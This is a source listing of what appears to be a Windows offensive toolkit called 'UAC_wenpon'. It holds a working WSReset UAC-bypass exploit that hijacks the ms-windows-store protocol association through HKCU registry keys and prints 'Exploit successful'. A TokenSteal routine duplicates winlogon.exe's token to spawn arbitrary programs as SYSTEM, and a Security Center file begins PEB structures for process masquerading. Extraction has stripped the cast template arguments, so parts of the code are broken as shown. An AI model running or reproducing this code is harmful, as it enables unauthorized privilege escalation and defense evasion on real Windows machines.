0) 31 | return reinterpret_cast(i); 32 | } 33 | 34 | return reinterpret_cast(nullptr); 35 | } 36 | 37 | struct RegistryEntry 38 | { 39 | explicit RegistryEntry(const wchar_t* path, const wchar_t* deletePath) : DeletePath(deletePath) 40 | { 41 | Status = RegCreateKeyExW(HKEY_CURRENT_USER, path, 0, nullptr, REG_OPTION_NON_VOLATILE, 42 | KEY_SET_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | DELETE, nullptr, 43 | &Handle, nullptr); 44 | } 45 | 46 | ~RegistryEntry() 47 | { 48 | RegCloseKey(Handle); 49 | RegDeleteTreeW(HKEY_CURRENT_USER, DeletePath); 50 | } 51 | 52 | LSTATUS SetValue(const wchar_t* valueName, const PVOID valueData, const DWORD valueSize) const 53 | { 54 | return RegSetValueExW(Handle, valueName, 0, REG_SZ, static_cast(valueData), valueSize); 55 | } 56 | 57 | LSTATUS GetStatus() const 58 | { 59 | return Status; 60 | } 61 | 62 | private: 63 | HKEY Handle{}; 64 | LSTATUS Status; 65 | const wchar_t* DeletePath; 66 | }; 67 | 68 | int WSReset(char* arg) 69 | { 70 | char* secret 
= arg; 71 | auto nt10{ false }; 72 | 73 | if (*reinterpret_cast(0x7FFE026C) == 10) 74 | nt10 = true; 75 | else if (*reinterpret_cast(0x7FFE026C) == 6 && *reinterpret_cast(0x7FFE0270) < 2) 76 | { 77 | std::wcout << L"OS not supported.\n"; 78 | return EXIT_FAILURE; 79 | } 80 | 81 | PWSTR systemPath; 82 | auto hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath); 83 | if (FAILED(hr)) 84 | { 85 | std::wcout << L"SHGetKnownFolderPath() failed. HRESULT: 0x" << std::hex << hr << std::endl; 86 | return EXIT_FAILURE; 87 | } 88 | bstr_t b(secret); 89 | WCHAR* x = b; 90 | //std::wstring cmdLoc{ systemPath }; 91 | //CoTaskMemFree(systemPath); 92 | //cmdLoc += L"\\cmd.exe /C \"start cmd.exe\""; 93 | 94 | const RegistryEntry progId{ 95 | L"SOFTWARE\\Classes\\scareing\\shell\\open\\command", L"SOFTWARE\\Classes\\scareing" 96 | }; 97 | if (progId.GetStatus()) 98 | { 99 | std::wcout << L"RegCreateKeyExW() failed. LSTATUS: " << progId.GetStatus() << std::endl; 100 | return EXIT_FAILURE; 101 | } 102 | 103 | const auto status = progId.SetValue(nullptr, x, wcslen(x) * 2 + 2); 104 | if (status) 105 | { 106 | std::wcout << L"RegSetValueExW() failed. LSTATUS: " << status << std::endl; 107 | return EXIT_FAILURE; 108 | } 109 | 110 | hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY); 111 | if (FAILED(hr)) 112 | { 113 | std::wcout << L"CoInitializeEx() failed. 
HRESULT: 0x" << std::hex << hr << std::endl; 114 | return EXIT_FAILURE; 115 | } 116 | 117 | if (nt10) 118 | { 119 | const auto UserAssocSetInternal = LocateSignature( 120 | SIGNATURE_NT10, sizeof SIGNATURE_NT10, ".text", 121 | LoadLibraryExW(L"SystemSettings.Handlers.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32)); 122 | if (!UserAssocSetInternal) 123 | { 124 | CoUninitialize(); 125 | std::wcout << L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" not found.\n"; 126 | return EXIT_FAILURE; 127 | } 128 | UserAssocSetInternal(nullptr, L"ms-windows-store", L"scareing", 1); 129 | } 130 | else 131 | { 132 | const auto UserAssocSet = LocateSignature(SIGNATURE_NT6X, sizeof SIGNATURE_NT6X, ".text", 133 | LoadLibraryExW(L"shell32.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32)); 134 | if (!UserAssocSet) 135 | { 136 | CoUninitialize(); 137 | std::wcout << L"shell32.dll!UserAssocSet not found.\n"; 138 | return EXIT_FAILURE; 139 | } 140 | UserAssocSet(2, L"ms-windows-store", L"scareing"); 141 | } 142 | 143 | CoUninitialize(); 144 | 145 | SHELLEXECUTEINFOW info{ 146 | sizeof SHELLEXECUTEINFOW, SEE_MASK_NOCLOSEPROCESS | SEE_MASK_UNICODE, nullptr, L"open", L"wsreset.exe", nullptr, 147 | nullptr, SW_HIDE, nullptr, nullptr, nullptr, nullptr, NULL, nullptr, nullptr 148 | }; 149 | 150 | if (!ShellExecuteExW(&info)) 151 | { 152 | std::wcout << L"ShellExecuteExW() failed. GetLastError(): " << GetLastError() << std::endl; 153 | return EXIT_FAILURE; 154 | } 155 | 156 | std::wcout << L"Waiting for WSReset.exe to exit . . 
.\n"; 157 | WaitForSingleObject(info.hProcess, INFINITE); 158 | CloseHandle(info.hProcess); 159 | RegDeleteTreeW( 160 | HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store"); 161 | 162 | auto* hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE); 163 | 164 | SetConsoleTextAttribute(hStdOutput, 14); 165 | std::wcout << L"["; 166 | SetConsoleTextAttribute(hStdOutput, 15); 167 | std::wcout << L"%"; 168 | SetConsoleTextAttribute(hStdOutput, 14); 169 | std::wcout << L"] "; 170 | SetConsoleTextAttribute(hStdOutput, 14); 171 | std::wcout << L"*** Exploit successful.\n\n"; 172 | SetConsoleTextAttribute(hStdOutput, 7); 173 | 174 | return 0; 175 | } 176 | -------------------------------------------------------------------------------- /TokenSteal.cpp: -------------------------------------------------------------------------------- 1 | #include "TokenSteal.h" 2 | 3 | #pragma comment(lib,"Advapi32.lib") 4 | 5 | namespace RAII 6 | { 7 | Handle::Handle(HANDLE inputHandle) 8 | { 9 | _internalHandle = inputHandle; 10 | } 11 | 12 | Handle::~Handle() 13 | { 14 | ::CloseHandle(_internalHandle); 15 | } 16 | 17 | HANDLE Handle::GetHandle() 18 | { 19 | return _internalHandle; 20 | } 21 | } 22 | 23 | namespace RAII 24 | { 25 | Hmodule::Hmodule(HMODULE inputHmodule) 26 | { 27 | _internalHmodule = inputHmodule; 28 | } 29 | 30 | Hmodule::~Hmodule() 31 | { 32 | ::FreeLibrary(_internalHmodule); 33 | } 34 | 35 | HMODULE Hmodule::GetHmodule() 36 | { 37 | return _internalHmodule; 38 | } 39 | } 40 | 41 | void Error(_In_ DWORD lastError) 42 | { 43 | wchar_t buf[256]; 44 | FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 45 | NULL, lastError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 46 | buf, (sizeof(buf) / sizeof(wchar_t)), NULL); 47 | 48 | std::wcout << "[-] Error code: 0x" << std::hex << lastError << L". 
Error string: " << buf; 49 | } 50 | /* Returns the PID of the first process whose image name (lower-cased) equals imageName, or ERROR_FILE_NOT_FOUND (2) when nothing matches or the snapshot fails. NOTE(review): CreateToolhelp32Snapshot returns INVALID_HANDLE_VALUE, not NULL, on failure, so the `!snapshot.GetHandle()` check never fires and the RAII wrapper ends up closing INVALID_HANDLE_VALUE; imageName itself is not lower-cased, so callers must pass it in lower case; a return value of 2 is indistinguishable from a real PID 2. */ 51 | DWORD FindPid(_In_ std::wstring imageName) 52 | { 53 | 54 | // create snapshot of processes using RAII classes 55 | RAII::Handle snapshot( 56 | CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL) 57 | ); 58 | 59 | if (!snapshot.GetHandle()) 60 | { 61 | Error(::GetLastError()); 62 | return ERROR_FILE_NOT_FOUND; 63 | } 64 | 65 | PROCESSENTRY32W processEntry; 66 | processEntry.dwSize = sizeof(PROCESSENTRY32W); 67 | auto status = Process32FirstW(snapshot.GetHandle(), &processEntry); // start enumerating from the first process 68 | if (!status) 69 | { 70 | Error(::GetLastError()); 71 | return ERROR_FILE_NOT_FOUND; 72 | } 73 | 74 | do 75 | { 76 | std::wstring processImage = processEntry.szExeFile; 77 | std::transform(processImage.begin(), processImage.end(), processImage.begin(), towlower); 78 | if (processImage == imageName) 79 | { 80 | std::wcout << L"[+] Found process " << processEntry.szExeFile << " with PID " << processEntry.th32ProcessID << std::endl; // return the first match's PID to the caller 81 | return processEntry.th32ProcessID; 82 | } 83 | } while (Process32NextW(snapshot.GetHandle(), &processEntry)); 84 | 85 | return ERROR_FILE_NOT_FOUND; 86 | } 87 | /* Enables or disables one named privilege on hToken. Returns FALSE if the LUID lookup or AdjustTokenPrivileges fails. NOTE(review): TokenSteal.h declares this routine as SetPrivilege; the definition here is named SePrivTokenrivilege, so SetPrivilege has no definition in this file. AdjustTokenPrivileges returns TRUE even when the privilege is not held by the token (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so TRUE here does not prove the privilege was enabled. */ 88 | BOOL SePrivTokenrivilege( 89 | HANDLE hToken, 90 | LPCTSTR lpszPrivilege, 91 | BOOL bEnablePrivilege 92 | ) 93 | { 94 | LUID luid; 95 | 96 | if (!LookupPrivilegeValue( 97 | NULL, 98 | lpszPrivilege, 99 | &luid)) 100 | { 101 | return FALSE; 102 | } 103 | 104 | TOKEN_PRIVILEGES PrivToken; 105 | PrivToken.PrivilegeCount = 1; 106 | PrivToken.Privileges[0].Luid = luid; 107 | if (bEnablePrivilege) 108 | PrivToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 109 | else 110 | PrivToken.Privileges[0].Attributes = 0; 111 | 112 | 113 | if (!AdjustTokenPrivileges( 114 | hToken, 115 | FALSE, 116 | &PrivToken, 117 | sizeof(TOKEN_PRIVILEGES), 118 | (PTOKEN_PRIVILEGES)NULL, 119 | (PDWORD)NULL)) 120 | { 121 | return FALSE; 122 | } 123 | 124 | return TRUE; 125 | } 126 | /* TokenSteal(arg, arg2): enables SeDebugPrivilege, opens winlogon.exe, duplicates its token as a primary token and launches `arg` with command line `arg2` via CreateProcessWithTokenW. Returns 0 on success, 1 on any failure (after printing the error). NOTE(review): SeDebugPrivilege is normally present only on an elevated administrator token, so this routine presupposes elevation (it is a SYSTEM token-theft step, not a UAC bypass). */ 127 
| int TokenSteal(char* arg, char* arg2) 128 | { 129 | char* secret = arg; /* program to run (lpApplicationName) */ 130 | char* secret2 = arg2; /* its command line; may be NULL when the caller passed no fourth argument */ 131 | 132 | HANDLE hCurrentToken = NULL; 133 | BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrentToken); /* NOTE(review): result unused and hCurrentToken is never closed */ 134 | SePrivTokenrivilege(hCurrentToken, L"SeDebugPrivilege", TRUE); /* result ignored; a failure only shows up as the OpenProcess error below */ 135 | 136 | // open a handle to winlogon.exe (the HANDLE is wrapped in RAII::Handle from TokenSteal.h so that CloseHandle is always called) 137 | RAII::Handle winlogonHandle(::OpenProcess(PROCESS_ALL_ACCESS, false, FindPid(L"winlogon.exe"))); /* PROCESS_ALL_ACCESS is far more than OpenProcessToken needs; a query-information right would presumably suffice — not verified here */ 138 | if (winlogonHandle.GetHandle() == NULL) 139 | { 140 | std::cout << "[-] Could not get a handle to winlogon.exe" << std::endl; 141 | Error(::GetLastError()); 142 | return 1; 143 | } 144 | else std::cout << "[+] Opened handle to winlogon.exe: 0x" << winlogonHandle.GetHandle() << std::endl; 145 | 146 | // open a handle to winlogon's token 147 | HANDLE systemToken; /* NOTE(review): uninitialized; if OpenProcessToken fails, hSystemToken below wraps garbage and its destructor calls CloseHandle on it — initialize to NULL or wrap after the check */ 148 | BOOL success = ::OpenProcessToken(winlogonHandle.GetHandle(), TOKEN_DUPLICATE, &systemToken); 149 | RAII::Handle hSystemToken(systemToken); // assigning the HANDLE obtained through OpenProcessToken() to a RAII type 150 | if (!success) 151 | { 152 | std::cout << "[-] Could not get SYSTEM token. " << std::endl; 153 | ::Error(::GetLastError()); 154 | return 1; 155 | } 156 | else std::cout << "[+] Stolen SYSTEM token!" << std::endl; 157 | 158 | // create a new token and duplicate winlogon's token inside it 159 | HANDLE newSystemToken = NULL; 160 | success = ::DuplicateTokenEx 161 | ( 162 | hSystemToken.GetHandle(), 163 | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, 164 | nullptr, 165 | SecurityImpersonation, 166 | TokenPrimary, 167 | &newSystemToken 168 | ); 169 | RAII::Handle hNewSystemToken(newSystemToken); 170 | if (!success) 171 | { 172 | std::cout << "[-] Failed to call DuplicateTokenEx() on the stolen token. 
" << std::endl; 173 | ::Error(::GetLastError()); 174 | return 1; 175 | } 176 | else std::cout << "[+] SYSTEM token successfully duplicated!" << std::endl; 177 | 178 | // spawn the requested program (argv[2]) using the newly duplicated SYSTEM token 179 | STARTUPINFO si = { sizeof(si) }; // startup info structure, used to specify custom configurations for the process 180 | PROCESS_INFORMATION pi; // process information structure that will hold HANDLEs to the child process/thread 181 | 182 | bstr_t b(secret); 183 | wchar_t* x = b; 184 | bstr_t b2(secret2); 185 | wchar_t* x2 = b2; 186 | /* NOTE(review): per the API documentation CreateProcessWithTokenW requires SeImpersonatePrivilege in the caller; a failure is reported through Error() below */ 187 | success = ::CreateProcessWithTokenW 188 | ( 189 | hNewSystemToken.GetHandle(), // get the handle to the duplicated SYSTEM token 190 | NULL, 191 | x, // executable name/path 192 | x2, // command line (argv[3], or NULL when not supplied) 193 | NULL, 194 | nullptr, 195 | nullptr, 196 | &si, 197 | &pi 198 | );/* 199 | 200 | success = ::CreateProcessAsUserA( 201 | hNewSystemToken.GetHandle(), 202 | (LPCSTR)L"cmd.exe", 203 | nullptr, 204 | NULL, 205 | NULL, 206 | NULL, 207 | NULL, 208 | NULL, 209 | NULL, 210 | (LPSTARTUPINFOA)&si, 211 | &pi 212 | );*/ 213 | /* 214 | success = ::CreateProcessAsUser(hNewSystemToken.GetHandle(), // user token 215 | (LPWSTR)"C:\\Users\\admin\\Desktop\\artifact.exe", // app name 216 | NULL, // command line 217 | 0, // process attributes 218 | 0, // thread attributes 219 | FALSE, // don't inherit handles 220 | DETACHED_PROCESS, // flags 221 | 0, // environment block 222 | 0, // current dir 223 | &si, // startup info 224 | &pi);*/ 225 | if (!success) 226 | { 227 | std::wcout << L"[-] Failed to spawn " << x << L" running as SYSTEM. " << std::endl; 228 | ::Error(::GetLastError()); 229 | return 1; 230 | } 231 | else std::wcout << L"[+] Spawned " << x << L" running as SYSTEM!" 
<< std::endl; 232 | 233 | // close the HANDLEs obtained with CreateProcessWithTokenW() which were not assigned to a RAII type variable 234 | ::CloseHandle(pi.hProcess); 235 | ::CloseHandle(pi.hThread); 236 | 237 | return 0; 238 | } -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 
| *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web 
deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | 
Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 
295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /UAC_wenpon.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | 
{98546e43-50e2-400b-b7dc-215205d045e7} 25 | UACwenpon 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | MultiThreaded 106 | 107 | 108 | Console 109 | true 110 | true 111 | false 112 | 113 | 114 | 115 | 116 | TurnOffAllWarnings 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | false 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | MultiThreaded 135 | 136 | 137 | Console 138 | true 139 | true 140 | true 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | -------------------------------------------------------------------------------- /Security Center.cpp: -------------------------------------------------------------------------------- 1 | #include "Security Center.h" 2 | 3 | 4 | 5 | #pragma region NT Stuff 6 | typedef struct _UNICODE_STRING 7 | { 8 | unsigned short Length; 9 | unsigned short MaximumLength; 10 | long Padding_8; 11 | wchar_t* Buffer; 12 | } UNICODE_STRING, * PUNICODE_STRING; 13 | 14 | typedef struct _CURDIR 15 | { 16 | struct _UNICODE_STRING DosPath; 17 | void* Handle; 18 | } CURDIR, * PCURDIR; 19 | 20 | typedef struct _STRING 21 | { 22 | 
unsigned short Length; 23 | unsigned short MaximumLength; 24 | long Padding_94; 25 | char* Buffer; 26 | } STRING, * PSTRING; 27 | 28 | typedef struct _RTL_DRIVE_LETTER_CURDIR 29 | { 30 | unsigned short Flags; 31 | unsigned short Length; 32 | unsigned long TimeStamp; 33 | struct _STRING DosPath; 34 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 35 | 36 | typedef struct _RTL_USER_PROCESS_PARAMETERS 37 | { 38 | unsigned long MaximumLength; 39 | unsigned long Length; 40 | unsigned long Flags; 41 | unsigned long DebugFlags; 42 | void* ConsoleHandle; 43 | unsigned long ConsoleFlags; 44 | long Padding_95; 45 | void* StandardInput; 46 | void* StandardOutput; 47 | void* StandardError; 48 | struct _CURDIR CurrentDirectory; 49 | struct _UNICODE_STRING DllPath; 50 | struct _UNICODE_STRING ImagePathName; 51 | struct _UNICODE_STRING CommandLine; 52 | void* Environment; 53 | unsigned long StartingX; 54 | unsigned long StartingY; 55 | unsigned long CountX; 56 | unsigned long CountY; 57 | unsigned long CountCharsX; 58 | unsigned long CountCharsY; 59 | unsigned long FillAttribute; 60 | unsigned long WindowFlags; 61 | unsigned long ShowWindowFlags; 62 | long Padding_96; 63 | struct _UNICODE_STRING WindowTitle; 64 | struct _UNICODE_STRING DesktopInfo; 65 | struct _UNICODE_STRING ShellInfo; 66 | struct _UNICODE_STRING RuntimeData; 67 | struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; 68 | unsigned __int64 EnvironmentSize; 69 | unsigned __int64 EnvironmentVersion; 70 | void* PackageDependencyData; 71 | unsigned long ProcessGroupId; 72 | unsigned long LoaderThreads; 73 | struct _UNICODE_STRING RedirectionDllName; 74 | struct _UNICODE_STRING HeapPartitionName; 75 | unsigned __int64* DefaultThreadpoolCpuSetMasks; 76 | unsigned long DefaultThreadpoolCpuSetMaskCount; 77 | long __PADDING__[1]; 78 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 79 | 80 | constexpr auto PEB_OFFSET = 0x60ULL; 81 | constexpr auto PROCESS_PARAM_OFFSET = 0x20ULL; 82 | constexpr auto 
BASENAME_OFFSET = 0x58ULL;
constexpr auto FULLNAME_OFFSET = 0x48ULL;
constexpr auto DLL_BASE_OFFSET = 0x30ULL;
constexpr auto OS_MAJOR_VERSION_OFFSET = 0x118ULL;
constexpr auto OS_MINOR_VERSION_OFFSET = 0x11CULL;
#pragma endregion

// NOTE(review): this listing was extracted from HTML. The template arguments of
// every *_cast below, the parameter list of `template` on LocateSignature, and the
// explicit template argument on the two LocateSignature calls were stripped, and
// `¶ms` is `&params` with the ampersand HTML-decoded. Only the one cast whose `<`
// was followed by a line break (reinterpret_cast<\nULONG_PTR>) survived. The code
// as shown does not compile; read it against the original source.

using RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR);
using LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN);
using LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID);

// Hand-declared prototypes for two unexported routines that are located by byte
// signature below (shell32.dll on 6.2/6.3, SystemSettings.Handlers.dll on 10.0).
// The parameter meanings are the author's guesses (see the names) and are tied to
// the specific builds the signatures were taken from.
using UserAssocSetPtr = void(WINAPI*)(int unknown0, PCWCHAR fileType, PCWCHAR progId);
using UserAssocSetInternalPtr = HRESULT(WINAPI*)(void* unused0, PCWCHAR fileType, PCWCHAR progId, int unknown0);

// Context handed to the LdrEnumerateLoadedModules callback in ForgeProcessInformation_sc.
struct LDR_CALLBACK_PARAMS
{
